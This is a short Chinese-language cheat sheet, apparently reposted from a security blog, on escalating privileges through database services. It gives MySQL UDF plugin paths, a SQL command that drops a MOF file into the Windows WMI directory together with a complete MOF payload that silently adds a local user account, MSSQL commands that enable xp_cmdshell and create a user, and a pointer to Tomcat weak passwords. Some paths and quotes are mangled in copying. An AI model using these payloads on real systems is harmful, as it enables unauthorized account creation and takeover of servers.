内网提权-服务篇
Posted drac4ry
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了内网提权-服务篇相关的知识,希望对你有一定的参考价值。
服务提权
-
UDF提权
- 要求有写权限,并且未过滤单引号
windows
UDF导出到系统目录 C:/WINDOWS/SYSTEM32/
MYSQL版本 < 5.1
UDF导出到安装路径 MYSQLLibPlugin
MYSQL版本 > 5.1
linux
- /usr/lib/mysql/plugin
MOF提权
只有windows
步骤
- 1.找个可写目录,将MOF文件上传
- 2.执行以下sql语句,mof文件内命令便会执行
- select load_file(‘C:/wmpub/nullevt.mof‘) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof‘
- mofcomp.exe xxx.mof 执行mof文件
- 调用lmofcompiler接口的$complieFile方法
pragma namespace(“\. ootsubscription”)
instance of __EventFilter as $EventFilter
{
EventNamespace = “RootCimv2”;
Name = “filtP2”;
Query = “Select * From __InstanceModificationEvent “
“Where TargetInstance Isa ”Win32_LocalTime” “
“And TargetInstance.Second = 5”;
QueryLanguage = “WQL”;
};
instance of ActiveScriptEventConsumer as $Consumer
{
Name = “consPCSV2”;
ScriptingEngine = “JScript”;
ScriptText =
“var WSH = new ActiveXObject(”WScript.Shell”) WSH.run(”net.exe user secist 123 /add”)“;
};
instance of __FilterToConsumerBinding
{
Consumer = $Consumer;
Filter = $EventFilter;
};
mssql
xp_cmdshell
- 开启:
EXEC sp_configure ‘show advanced options‘,1;
RECONFIGURE;
EXEC sp_configure ‘xp_cmdshell‘,1;
RECONFIGURE; - exec xp_cmdshell ‘net user test test /add‘
- 开启:
- xp_regwrite
xp_regread
tomcat
- 弱口令
以上是关于内网提权-服务篇的主要内容,如果未能解决你的问题,请参考以下文章